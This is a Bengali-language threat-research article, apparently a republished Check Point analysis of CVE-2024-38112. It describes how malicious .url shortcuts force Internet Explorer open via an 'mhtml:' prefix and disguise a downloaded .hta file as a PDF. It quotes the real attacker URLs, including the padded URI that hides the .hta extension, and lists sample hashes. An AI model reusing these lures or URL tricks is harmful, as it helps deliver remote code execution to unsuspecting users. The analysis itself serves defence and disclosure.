ইন্টারনেট এক্সপ্লোরারকে পুনরুত্থিত করা: ভিকটিমদের প্রলুব্ধ করার জন্য ইন্টারনেট শর্টকাট ফাইলে জিরো-ডে ট্রিক্স ব্যবহার করে অভিনেতাদের হুমকি (CVE-2024-38112)

হাইফেই লি দ্বারা

ভূমিকা এবং পটভূমি

চেক পয়েন্ট রিসার্চ সম্প্রতি আবিষ্কার করেছে যে হুমকি অভিনেতারা দূরবর্তী কোড কার্যকর করার জন্য উইন্ডোজ ব্যবহারকারীদের প্রলুব্ধ করার জন্য অভিনব (বা পূর্বে অজানা) কৌশল ব্যবহার করছে। বিশেষত, আক্রমণকারীরা বিশেষ উইন্ডোজ ইন্টারনেট শর্টকাট ফাইল (.url এক্সটেনশন নাম) ব্যবহার করত, যেটিতে ক্লিক করা হলে, আক্রমণকারী-নিয়ন্ত্রিত URL দেখার জন্য অবসরপ্রাপ্ত ইন্টারনেট এক্সপ্লোরার (IE) কে কল করবে। দূষিত .hta এক্সটেনশন নাম লুকানোর জন্য IE-তে একটি অতিরিক্ত কৌশল ব্যবহার করা হয়। উইন্ডোজে আধুনিক এবং অনেক বেশি সুরক্ষিত ক্রোম/এজ ব্রাউজারের পরিবর্তে IE দিয়ে URL খোলার মাধ্যমে, আক্রমণকারী শিকারের কম্পিউটারকে কাজে লাগানোর ক্ষেত্রে উল্লেখযোগ্য সুবিধা অর্জন করেছে, যদিও কম্পিউটারটি আধুনিক Windows 10/11 অপারেটিং সিস্টেম চালাচ্ছে।

কিছু প্রযুক্তিগত পটভূমির জন্য, এটা বিরল না হুমকি অভিনেতাদের জন্য তাদের প্রচারাভিযানে প্রাথমিক আক্রমণ ভেক্টর হিসেবে .url ফাইল ব্যবহার করতে। এমনকি উপন্যাস বা জিরো-ডে ইউআরএল-ফাইল-সম্পর্কিত দুর্বলতা ব্যবহার করার আগেও ঘটেছে-CVE-2023-36025যা গত নভেম্বরে প্যাচ করা হয়েছিল, এটি একটি ভাল উদাহরণ।

আমরা যে দূষিত .url নমুনাগুলি আবিষ্কার করেছি সেগুলির তারিখ যত তাড়াতাড়ি সম্ভব জানুয়ারী 2023 (এক বছরেরও বেশি আগে) সর্বশেষ থেকে 13 মে, 2024 (কয়েক দিন আগে, লেখার মতো)। এটি পরামর্শ দেয় যে হুমকি অভিনেতারা বেশ কিছুদিন ধরে আক্রমণের কৌশল ব্যবহার করে আসছে।

“mhtml” ট্রিকের মাধ্যমে ইন্টারনেট এক্সপ্লোরারকে পুনরুত্থিত করা

চলুন সর্বশেষ .url ব্যবহার করি নমুনা কৌশলটি ব্যাখ্যা করার জন্য একটি উদাহরণ হিসাবে ভাইরাস মোটের উপর।

নমুনার বিষয়বস্তু:

চিত্র 1: ক্ষতিকারক .url নমুনার বিষয়বস্তু
চিত্র 1: ক্ষতিকারক .url নমুনার বিষয়বস্তু

আমরা দেখতে পাচ্ছি, .url ফাইলের স্ট্রিংগুলির শেষ লাইনগুলি মাইক্রোসফ্ট এজ অ্যাপ্লিকেশন ফাইলের একটি কাস্টমাইজড আইকনের দিকে নির্দেশ করে msedge.exe. এটি একটি পিডিএফ ফাইলের দিকে নির্দেশ করে বলে মনে হবে (কিন্তু, আসলে, এটি নয়)।

গুরুত্বপূর্ণভাবে, আমরা দেখতে পাচ্ছি, এর মান URL কীওয়ার্ডটি সাধারণের চেয়ে বেশ আলাদা – সাধারণত, সাধারণ .url ফাইলগুলির জন্য, URL পরামিতি দেখতে হবে URL=https://www.google.com যা URL নির্দেশ করে https://www.google.com. কিন্তু এই নমুনায়, মান হল:

mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html

এটি একটি বিশেষ উপসর্গ ব্যবহার করে mhtml: এবং এছাড়াও একটি !x-usc: মাঝখানে।

কয়েক বছর আগে, আমরা একই কৌশল দেখেছি (যাকে আমরা “mhtml” ট্রিক বলি) কুখ্যাতে ব্যবহৃত CVE-2021-40444 শূন্য দিনের আক্রমণযেখানে ফাইল document.xml.rels ঠিক একই স্ট্রিং রয়েছে।

চিত্র 2: CVE-2021-40444 শোষণ নমুনার মূল বিষয়বস্তু
চিত্র 2: CVE-2021-40444 শোষণ নমুনার মূল বিষয়বস্তু

আমরা জানি CVE-2021-40444 দুর্বলতা কাজে লাগানোর সময় “mhtml” ট্রিকটি আগে Word নথিতে ব্যবহার করা হয়েছিল, এবং এখন আমরা দেখতে পাচ্ছি একই কৌশলটি .url ফাইলে ব্যবহার করা হয়েছে। তাহলে, আক্রমণকারীরা এটি ব্যবহার করে কী অর্জন করতে পারে? কিছু পরীক্ষা করা যাক.

যদি আমরা নমুনার নাম পরিবর্তন করি Books_A0UJKO.pdf.url (বন্যের নাম), .url ফাইলটি উইন্ডোজ 11-এ (সম্পূর্ণ প্যাচ করা) নিচের মত দেখাবে – একটি পিডিএফ ফাইলের লিঙ্ক হিসাবে প্রদর্শিত হবে।

চিত্র 3: দূষিত .url ফাইলটি Windows 11-এ একটি PDF ফাইলের লিঙ্ক হিসাবে প্রদর্শিত হয়
চিত্র 3: দূষিত .url ফাইলটি Windows 11-এ একটি PDF ফাইলের লিঙ্ক হিসাবে উপস্থিত হয়

যদি আমরা শিকারের মতো কাজ করি (আমরা পিডিএফ খুলতে চাই), আমরা শর্টকাট ফাইলটিতে ডাবল ক্লিক করি। তারপর, শিকার এটি পাবেন:

চিত্র 4: IE এবং একটি প্রচার উইন্ডো ডায়ালগ উপস্থিত হয় যখন শিকার .url ফাইলে ডাবল ক্লিক করে
চিত্র 4: IE এবং একটি প্রচার উইন্ডো ডায়ালগ উপস্থিত হয় যখন শিকার .url ফাইলে ডাবল ক্লিক করে

সেখানে কি অদ্ভুত দেখুন? ইন্টারনেট এক্সপ্লোরার খোলা হয়েছে। প্রকৃতপক্ষে, সামান্য ডিবাগিং দক্ষতার সাথে, আমরা নিশ্চিত করতে পেরেছিলাম যে IE প্রকৃতপক্ষে লিঙ্কটি খুলতে ব্যবহৃত হয়েছিল http://cbmelipilla[.]cl/te/test1.htmlযা .url ফাইলে নির্দিষ্ট করা আছে।

আমরা জানি, মাইক্রোসফট IE ঘোষণা করেছে অবসরপ্রাপ্ত বছর দুয়েক আগে। সাধারণ Windows 10/11-এ, সাধারণ ব্যবহারকারীর ক্রিয়াগুলি ওয়েবসাইটগুলি দেখার জন্য IE খুলতে সক্ষম হবে না কারণ তারা আধুনিক ব্রাউজারগুলির মতো একই স্তরের নিরাপত্তা উপভোগ করে না। IE একটি পুরানো ওয়েব ব্রাউজার এবং এটির নিরাপত্তাহীনতার জন্য সুপরিচিত ছিল – এবং এটি একটি বড় কারণ মাইক্রোসফ্ট এটিকে আধুনিক এবং আরও সুরক্ষিত মাইক্রোসফ্ট এজ দিয়ে প্রতিস্থাপন করেছে, অথবা ব্যবহারকারীরা শুধু Google থেকে Chrome ব্রাউজার ইনস্টল এবং ব্যবহার করে৷

দাবিত্যাগ: যদিও IE-কে “অবসরপ্রাপ্ত এবং সমর্থনের বাইরে” ঘোষণা করা হয়েছে, প্রযুক্তিগতভাবে বলতে গেলে, IE এখনও Windows OS এর অংশ এবং “স্বভাবতই অনিরাপদ নয়, কারণ IE এখনও নিরাপত্তা দুর্বলতার জন্য পরিসেবা করা হয়, এবং সেখানে কোন কিছু থাকা উচিত নয়। পরিচিত শোষণযোগ্য নিরাপত্তা দুর্বলতা,” মাইক্রোসফটের সাথে আমাদের যোগাযোগ অনুসারে।

সুতরাং, ডিফল্টরূপে, ব্যবহারকারীদের IE দিয়ে ওয়েবসাইট খোলা উচিত নয় যদি না ব্যবহারকারী বিশেষভাবে তা করতে না বলে এবং ব্যবহারকারীর সম্পূর্ণ জ্ঞান না থাকে।

যাইহোক, এই নমুনাতে, “mhtml” ট্রিক দিয়ে, শিকার যখন .url শর্টকাট খোলে (ভুক্তভোগী মনে করে যে সে একটি PDF খুলছে), আক্রমণকারী-নিয়ন্ত্রিত ওয়েবসাইটটি সাধারণ ক্রোমের পরিবর্তে IE দিয়ে খোলা হচ্ছে / প্রান্ত।

সেখান থেকে (ওয়েবসাইটটি IE দিয়ে খোলা হচ্ছে), আক্রমণকারী অনেক খারাপ কাজ করতে পারে কারণ IE অনিরাপদ এবং পুরানো। উদাহরণস্বরূপ, যদি আক্রমণকারীর একটি IE জিরো-ডে এক্সপ্লয়েট থাকে – যা Chrome/Edge-এর তুলনায় খুঁজে পাওয়া অনেক সহজ, আক্রমণকারী অবিলম্বে দূরবর্তী কোড কার্যকর করার জন্য শিকারকে আক্রমণ করতে পারে। যাইহোক, আমরা যে নমুনাগুলি বিশ্লেষণ করেছি তাতে, হুমকি অভিনেতারা কোনও IE রিমোট কোড এক্সিকিউশন শোষণ ব্যবহার করেনি। পরিবর্তে, তারা IE-তে আরেকটি কৌশল ব্যবহার করেছে – যা সম্ভবত আগে সর্বজনীনভাবে পরিচিত ছিল না – আমাদের সর্বোত্তম জ্ঞানের জন্য – দূরবর্তী কোড কার্যকর করার জন্য শিকারকে প্রতারণা করার জন্য।

অতিরিক্ত IE ট্রিক – .hta এক্সটেনশনের নাম লুকিয়ে রাখা

এর আগের চিত্রটি আবার পর্যালোচনা করা যাক (নীচে হাইলাইট করা হয়েছে)। প্রচারিত (IE) ডায়ালগ অনুসারে, এটি ব্যবহারকারীকে নামের একটি পিডিএফ ফাইল খুলতে বলে মনে হচ্ছে Books_A0UJKO.pdf.

চিত্র 5: IE ডায়ালগটি ঘনিষ্ঠভাবে দেখুন - শুধুমাত্র PDF ফাইলের নাম দেখানো হচ্ছে
চিত্র 5: IE ডায়ালগটি ঘনিষ্ঠভাবে দেখুন – শুধুমাত্র PDF ফাইলের নাম দেখাচ্ছে

যাইহোক, এটি কি এখানে আসল ঘটনা? আপনি কি মনে করেন আপনি একটি পিডিএফ খুলছেন?

আসলে তা না। যদি আমরা উপরের IE ডায়ালগে “খুলুন” (ডিফল্ট বিকল্প) ক্লিক করি, তাহলে আমরা আরেকটি প্রচারিত ডায়ালগ পাব (নিচেরটি দেখুন)। এটি IE এর সুরক্ষিত মোড (একটি অপেক্ষাকৃত দুর্বল ব্রাউজার স্যান্ডবক্স) এর কারণে।

চিত্র 6: IE সুরক্ষিত মোড সতর্কতা ডায়ালগ
চিত্র 6: IE সুরক্ষিত মোড সতর্কতা ডায়ালগ

ভিকটিম যদি সতর্কতা উপেক্ষা করতে থাকে (যেমন ভুক্তভোগী মনে করেন যে তিনি একটি পিডিএফ খুলছেন), ভিকটিমটির মেশিন শেষ পর্যন্ত হ্যাক হয়ে যাবে – “খোলা” ফাইলটি আসলে একটি দূষিত .hta ফাইল ডাউনলোড এবং চালানো হচ্ছে।

আমরা যদি HTTP ট্র্যাফিকের দিকে ঘনিষ্ঠভাবে তাকাই, আমরা দেখতে পাব যে অনেকগুলি অমুদ্রণযোগ্য অক্ষর রয়েছে Books_A0UJKO.pdf স্ট্রিং শেষ পর্যন্ত, .hta স্ট্রিং আছে—এটিই আসল (এবং বিপজ্জনক) এক্সটেনশনের নাম।

চিত্র 7: HTTP ট্র্যাফিক দেখায় যে সম্পূর্ণ URI পরিদর্শন করা হয়েছে
চিত্র 7: HTTP ট্র্যাফিক দেখায় যে সম্পূর্ণ URI পরিদর্শন করা হয়েছে

ঠিক এই কারণেই IE ডায়ালগ ব্যবহারকারীকে .hta ফাইলের নাম দেখায়নি। আসল সম্পূর্ণ URL হল:

https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80.hta

এই কৌশলের মাধ্যমে, আক্রমণকারী ভুক্তভোগীকে ক্রিয়া চালিয়ে যেতে প্রলুব্ধ করতে আরও সফল হতে পারে যখন প্রকৃতপক্ষে, শিকার একটি বিপজ্জনক .hta অ্যাপ্লিকেশন ডাউনলোড এবং সম্পাদন করছে।

bd710ee53ef3ad872f3f0678117050608a8e073c87045a06a86fb4a7f0e4eff0 b16aee58b7dfaf2a612144e2c993e29dcbd59d8c20e0fd0ab75b76dd9170e104 65142c8f490839a60f4907ab8f28dd9db4258e1cfab2d48e89437ef2188a6e94 bfd59ed369057c325e517b22be505f42d60916a47e8bdcbe690210a3087d466d 22e2d84c2a9525e8c6a825fb53f2f30621c5e6c68b1051432b1c5c625ae46f8c c9f58d96ec809a75679ec3c7a61eaaf3adbbeb6613d667257517bdc41ecca9ae

প্রতিরক্ষা এবং প্রশমন

আমরা নিশ্চিত করেছি যে আলোচিত শোষণের কৌশলগুলি – যা অন্তত এক বছর ধরে বন্য অঞ্চলে সক্রিয়ভাবে ব্যবহৃত হয়েছে, সর্বশেষ Windows 10/11 অপারেটিং সিস্টেমে কাজ করে৷

এই শূন্য-দিনের আক্রমণ থেকে রক্ষা করার জন্য চেক পয়েন্ট এই প্রকাশনার কয়েক মাস আগে আমাদের গ্রাহকদের জন্য “ইন্টারনেট শর্টকাট ফাইল রিমোট কোড এক্সিকিউশন” নামে আইপিএস এবং হারমনি ইমেলে নিম্নলিখিত সুরক্ষাগুলি প্রকাশ করেছে।

হারমনি ইমেল এবং সহযোগিতা সর্বোচ্চ নিরাপত্তা স্তরে এই শূন্য-দিনের আক্রমণের বিরুদ্ধে ব্যাপক ইনলাইন সুরক্ষা প্রদান করে।

আমরা বৃহস্পতিবার, 16 মে, 2024-এ মাইক্রোসফ্ট সিকিউরিটি রেসপন্স সেন্টারে (MSRC) আমাদের ফলাফলগুলি রিপোর্ট করেছি৷ তারপর থেকে, উভয় পক্ষই এই বিষয়ে ঘনিষ্ঠভাবে কাজ করছে, যার ফলে একটি মাইক্রোসফ্ট অফিসিয়াল প্যাচ (CVE-2024-38112) 9 জুলাই প্রকাশিত হয়েছে৷ Windows ব্যবহারকারীদের যত তাড়াতাড়ি সম্ভব প্যাচ প্রয়োগ করার জন্য অত্যন্ত সুপারিশ করা হচ্ছে৷

উদ্বিগ্ন Windows ব্যবহারকারীদের জন্য, আমরা অবিশ্বস্ত উত্স থেকে পাঠানো .url ফাইলগুলির বিষয়ে বিশেষভাবে সতর্ক থাকার পরামর্শ দিই৷ আমরা যেমন আলোচনা করেছি, এই ধরনের আক্রমণ সফল হওয়ার জন্য কয়েকটি সতর্কতা (ব্যবহারকারীর মিথস্ক্রিয়া) প্রয়োজন।

চেক পয়েন্ট রিসার্চ বিশ্বজুড়ে এই ধরনের আক্রমণের সাথে সম্পর্কিত ক্রিয়াকলাপগুলি পর্যবেক্ষণ করে চলেছে৷

উপসংহার

শোষণের দৃষ্টিকোণ থেকে আক্রমণগুলিকে সংক্ষিপ্ত করতে: এই প্রচারাভিযানে ব্যবহৃত প্রথম কৌশলটি হল “mhtml” কৌশল, যা আক্রমণকারীকে আরও নিরাপদ Chrome/Edge-এর পরিবর্তে IE কল করতে দেয়৷ দ্বিতীয় কৌশলটি হল একটি IE কৌশল যাতে শিকারকে বিশ্বাস করাতে পারে যে তারা একটি পিডিএফ ফাইল খুলছে, আসলে তারা একটি বিপজ্জনক ডাউনলোড এবং সম্পাদন করছে। .hta অ্যাপ্লিকেশন। এই আক্রমণের সামগ্রিক লক্ষ্য হল ভিকটিমদের বিশ্বাস করানো যে তারা একটি পিডিএফ ফাইল খুলছে এবং এই দুটি কৌশল ব্যবহার করে এটি সম্ভব হয়েছে।

Source link

Related Post

Leave a Reply

Your email address will not be published. Required fields are marked *

Raytahost Facebook Sharing Powered By : Raytahost.com